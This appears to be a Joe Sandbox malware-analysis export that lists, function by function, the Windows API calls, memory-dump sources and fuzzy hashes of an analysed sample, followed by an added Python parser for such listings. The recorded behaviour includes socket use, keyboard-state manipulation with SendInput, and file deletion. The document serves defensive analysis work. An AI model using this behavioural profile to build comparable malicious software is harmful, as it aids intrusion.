                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                          • String ID: %s%d
                                                                                                                                                                                                                                          • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                          • Opcode ID: e2f9a51e446e7b296c3c345ddef72f12cf11c0abf36d870b99b7c3298801a941
                                                                                                                                                                                                                                          • Instruction ID: 28cbf536bf13535c3c06a3c248510ed49695400487ac7a37dde7ad775d98522d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2f9a51e446e7b296c3c345ddef72f12cf11c0abf36d870b99b7c3298801a941
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8711B171600205ABDF157FB0CC85EFE376AAF94314F044076F919AB292DF7199498B70
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001658C1
• SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001658EE
• DrawMenuBar.USER32(?), ref: 001658FD
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Menu$InfoItem$Draw
• String ID: 0
• API String ID: 3227129158-4108050209
• Opcode ID: dad58f38a7ab95321375a3eac70a6c1ee857ff97b1f49fc273c1acffe2c2d440
• Instruction ID: a7828aa2970163532439ad531e1f911ce0e1420d30d440c29143e9846627a4b4
• Opcode Fuzzy Hash: dad58f38a7ab95321375a3eac70a6c1ee857ff97b1f49fc273c1acffe2c2d440
• Instruction Fuzzy Hash: FE016D31600258EFDB219F11DC44BAEBBB5FB45364F108099E889D6251DF709A94DF71
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0012D3BF
• FreeLibrary.KERNEL32 ref: 0012D3E5
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: GetSystemWow64DirectoryW$X64
• API String ID: 3013587201-2590602151
• Opcode ID: 182239bca134ec0ff8cf853e11cb7ea8c4cfdf0725ca4c7bb85f04871d7d1239
• Instruction ID: fe1bc4b8ae637de969e50f87cff375e0c1a0a942ee7ad507b8d74e24e8abb4fe
• Opcode Fuzzy Hash: 182239bca134ec0ff8cf853e11cb7ea8c4cfdf0725ca4c7bb85f04871d7d1239
• Instruction Fuzzy Hash: 5DF0AB71801631DBD7355611FC54AFD3310BF01B81F6A8116F842F1104DB60CDA083C2
Uniqueness

Uniqueness Score: -1.00%
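As an added example (not part of the Joe Sandbox report or its tooling): a small Python parser for the per-function listings in this text export, so that the API call chain, the Similarity identifiers and the fuzzy hashes of each function can be pulled out for triage or compared across samples. It assumes only the layout visible in the listing (section headers such as "APIs" and "Similarity", "•" bullet lines, and a "Uniqueness Score" line closing each function block); the sample input is constructed from lines of the listing above, and the "Download File" link label that such exports can carry on Associated lines is stripped during parsing. The `dynamically_resolved` helper simply collects the names the report shows being passed by string to GetProcAddress, as with GetSystemWow64DirectoryW in the block above.

```python
"""Parser for the per-function listings in a Joe Sandbox text export.

Added example, not Joe Sandbox code. Assumes the plain-text layout shown in
this report: section headers, bullet lines starting with "•", and a
"Uniqueness Score: ...%" line closing each function block.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

API_RE = re.compile(
    r"^•\s*(?P<func>\w+)\.(?P<module>\w+)"          # e.g. GetProcAddress.KERNEL32
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(?P<score>-?\d+(?:\.\d+)?)%$")
HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
           "Similarity", "Uniqueness"}
LINK_RESIDUE = "Download File"   # link label glued onto "Associated" lines by extraction


@dataclass
class ApiCall:
    function: str
    module: str
    args: List[str]
    ref: int                      # call-site address, parsed from hex


@dataclass
class FunctionRecord:
    api_calls: List[ApiCall] = field(default_factory=list)
    associated: List[str] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)   # Similarity / dump-source fields
    unparsed: List[str] = field(default_factory=list)      # anything the layout assumption missed
    uniqueness_score: Optional[float] = None


def parse_report(text: str) -> List[FunctionRecord]:
    """Split the export into one FunctionRecord per 'Uniqueness Score' block."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADERS:
            section = line
            continue
        m = SCORE_RE.match(line)
        if m:                                   # block terminator
            cur.uniqueness_score = float(m.group("score"))
            records.append(cur)
            cur, section = FunctionRecord(), None
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a for a in (m.group("args") or "").split(",") if a]
                cur.api_calls.append(ApiCall(m.group("func"), m.group("module"),
                                             args, int(m.group("ref"), 16)))
            else:
                cur.unparsed.append(line)
            continue
        m = KV_RE.match(line)
        if m:
            key, val = m.group("key").strip(), m.group("val").strip()
            if val.endswith(LINK_RESIDUE):
                val = val[: -len(LINK_RESIDUE)].strip()
            if key == "Associated":
                cur.associated.append(val)
            else:
                cur.fields[key] = val
        else:
            cur.unparsed.append(line)
    return records


def api_sequence(rec: FunctionRecord) -> str:
    """Compact call chain in call-site address order, handy for diffing across samples."""
    return " -> ".join(f"{c.function}.{c.module}"
                       for c in sorted(rec.api_calls, key=lambda c: c.ref))


def dynamically_resolved(records: List[FunctionRecord]) -> List[str]:
    """Export names the report shows being passed by string to GetProcAddress."""
    names = []
    for rec in records:
        for c in rec.api_calls:
            if c.function == "GetProcAddress" and len(c.args) >= 2 and c.args[1] != "?":
                names.append(c.args[1])
    return names


# Constructed sample: lines copied from two of the function listings above.
SAMPLE = """\
APIs
• GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0012D3BF
• FreeLibrary.KERNEL32 ref: 0012D3E5
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Similarity
• API ID: AddressFreeLibraryProc
• String ID: GetSystemWow64DirectoryW$X64
• Instruction Fuzzy Hash: 5DF0AB71801631DBD7355611FC54AFD3310BF01B81F6A8116F842F1104DB60CDA083C2
Uniqueness

Uniqueness Score: -1.00%

APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0016FC08,?), ref: 001305F0
• _memcmp.LIBVCRUNTIME ref: 0013064E
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID:
Uniqueness

Uniqueness Score: -1.00%
"""

if __name__ == "__main__":
    for rec in parse_report(SAMPLE):
        print(api_sequence(rec), "|", rec.fields.get("API ID"), "|", rec.uniqueness_score)
```

Lines an export emits in a shape the regexes do not expect land in `unparsed` rather than being silently dropped, which is the check to look at first when pointing the parser at a different report version.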

Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a6f71cb3a1544c63875ee238d4a7f3a7321d26abf6216deedc273cd25b117a06
• Instruction ID: 515dbfa05720405c021504c8b630bb10cdd2914917057b02b3f688ac6d8c4127
• Opcode Fuzzy Hash: a6f71cb3a1544c63875ee238d4a7f3a7321d26abf6216deedc273cd25b117a06
• Instruction Fuzzy Hash: EFC13975A0021AEFDB15CFA4C8A4EAEB7B5FF48704F218598E505EB251D731EE81CB90
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
• Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
• Instruction ID: fa40d6d6d899274b05a71e5a5509faada3e012e0adae360e0533a5139f83f3e5
• Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
• Instruction Fuzzy Hash: B5A145B2E002869FEB25CF18C8917AEBBE4EF65350F18416DE6D59B2C1C3B49981C751
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Variant$ClearInitInitializeUninitialize
• String ID:
• API String ID: 1998397398-0
• Opcode ID: e8fe028e81c989074c9c6bfb7e410f9ba4a4de8752ad513cd1a8b05637daca04
• Instruction ID: 473fd65b01a58d934b6fffd46c806a2a9dc8e186e114b3ade9992feb0107e864
• Opcode Fuzzy Hash: e8fe028e81c989074c9c6bfb7e410f9ba4a4de8752ad513cd1a8b05637daca04
• Instruction Fuzzy Hash: D1A15775204700DFC700DF28C485A6AB7E5EF88351F048859FDAA9B362DB70EE05CBA2
Uniqueness

Uniqueness Score: -1.00%

APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0016FC08,?), ref: 001305F0
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0016FC08,?), ref: 00130608
• CLSIDFromProgID.OLE32(?,?,00000000,0016CC40,000000FF,?,00000000,00000800,00000000,?,0016FC08,?), ref: 0013062D
• _memcmp.LIBVCRUNTIME ref: 0013064E
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID:
                                                                                                                                                                                                                                          • API String ID: 314563124-0
                                                                                                                                                                                                                                          • Opcode ID: 926b97b68ab1df03eeeb07893fa04aafdaf87bac9e86c5dd7d6875fddc60416c
                                                                                                                                                                                                                                          • Instruction ID: 70304cbcf422e4638a2aa780ad5c40242cbcdeaac0d114adff503fdf11b34e83
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 926b97b68ab1df03eeeb07893fa04aafdaf87bac9e86c5dd7d6875fddc60416c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD811971A00209EFCB05DF94C994EEEB7F9FF89315F204598E506AB250DB71AE46CB60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                                                                          • Opcode ID: 8d1a801bdc663febffd10124db6677de2b9c5366977b98a18c831703bd5eb4db
                                                                                                                                                                                                                                          • Instruction ID: 3f5f4d34a2b49371786c634203a9772bc1ce6dbcbb63ed545009048de8ac6a5f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d1a801bdc663febffd10124db6677de2b9c5366977b98a18c831703bd5eb4db
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60417B31600105BBDB2D6BF88C456FEBAA5FF51730F140235F618C39D2E77048C19262
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 001662E2
                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00166315
                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00166382
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3880355969-0
                                                                                                                                                                                                                                          • Opcode ID: b8a0b726346c2db7bf23e429e3cc01c3cb51ee849c8c898859a1fd09e3644583
                                                                                                                                                                                                                                          • Instruction ID: 82b23530156f68ddf3dc7e6c3231acdb89fe747262e694ce371c91c003f3639a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8a0b726346c2db7bf23e429e3cc01c3cb51ee849c8c898859a1fd09e3644583
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7510A75A00209AFDF10DF68DC809AE7BB5FB55364F10815AF8599B390D770ED91CB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00151AFD
                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 00151B0B
                                                                                                                                                                                                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00151B8A
                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 00151B94
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$socket
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1881357543-0
                                                                                                                                                                                                                                          • Opcode ID: c1da1c95bf00c83d03bda7da7be8c394dfaaf17b91f0502b52cc00da78aaf84d
                                                                                                                                                                                                                                          • Instruction ID: 3f3d3380add0f44c2f1d4be2237ee6065a38762ccefe9228cc5edd9aa24a0474
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1da1c95bf00c83d03bda7da7be8c394dfaaf17b91f0502b52cc00da78aaf84d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A841E274600301AFE721AF24C886F6977E5AB44718F548458F96A9F3D3D7B2DD81CB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1c73b0f6b516a6bac89dd85c3e0cc265cd0c9e52cdaeb99b68de2208f6be6534
                                                                                                                                                                                                                                          • Instruction ID: 5e70635bcb125a82353bcbc93feec966e66981998aa0e4d81a1708cc140a64a8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c73b0f6b516a6bac89dd85c3e0cc265cd0c9e52cdaeb99b68de2208f6be6534
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E411D72904304BFD7259F78CC85BAEBBE9EF98710F10456AF186DB6C2D7B19A418780
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00145783
• GetLastError.KERNEL32(?,00000000), ref: 001457A9
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 001457CE
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 001457FA
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
• Opcode ID: c0bba2ac226db908963e0003b393363b797f6d6920c604a0a1edee90853f31f0
• Instruction ID: 265f6805021ab712edfe919ac1f8fcc16376873de5acbccff6676bc7ea75a9ce
• Opcode Fuzzy Hash: c0bba2ac226db908963e0003b393363b797f6d6920c604a0a1edee90853f31f0
• Instruction Fuzzy Hash: 52414E39600B11DFCB11DF15C444A5EBBE2EF89720B598499EC4AAB366DB70FD40CBA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,000F6D71,00000000,00000000,000F82D9,?,000F82D9,?,00000001,000F6D71,8BE85006,00000001,000F82D9,000F82D9), ref: 0010D910
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0010D999
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0010D9AB
• __freea.LIBCMT ref: 0010D9B4
  • Part of subcall function 00103820: RtlAllocateHeap.NTDLL(00000000,?,001A1444,?,000EFDF5,?,?,000DA976,00000010,001A1440,000D13FC,?,000D13C6,?,000D1129), ref: 00103852
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• API String ID: 2652629310-0
• Opcode ID: fa6e2bb0cae9af8cea529d7cd6c4ecf68031f544c27a98973beb3c56ebecc1e0
• Instruction ID: 57ee95159a8ac6e435997938e0f0f1fdc0b823407d1e4c89e2b2a3a3decef3e2
• Opcode Fuzzy Hash: fa6e2bb0cae9af8cea529d7cd6c4ecf68031f544c27a98973beb3c56ebecc1e0
• Instruction Fuzzy Hash: 3D31AD72A0020AABDB24DFA4EC41EAE7BA5EB41314F054269FC44D6291EB75CD90CBA0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0013AAAC
• SetKeyboardState.USER32(00000080), ref: 0013AAC8
• PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0013AB36
• SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0013AB88
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: 9d5f39b3a9a2fb5aded015cbf5f8e5ace1b3cf5b4ab6e6221f308131b0ef5004
• Instruction ID: 0669eb1cfe5f57511867cccbb5350bc985a12e1e8e2893d4e1d90cd4bc895150
• Opcode Fuzzy Hash: 9d5f39b3a9a2fb5aded015cbf5f8e5ace1b3cf5b4ab6e6221f308131b0ef5004
• Instruction Fuzzy Hash: CE313931A40248AEFF35CB64CC05BFABBAAAF54320F84421AF5C1961D5D3749981C7A3
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,00001024,00000000,?), ref: 00165352
• GetWindowLongW.USER32(?,000000F0), ref: 00165375
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00165382
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001653A8
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: LongWindow$InvalidateMessageRectSend
• String ID:
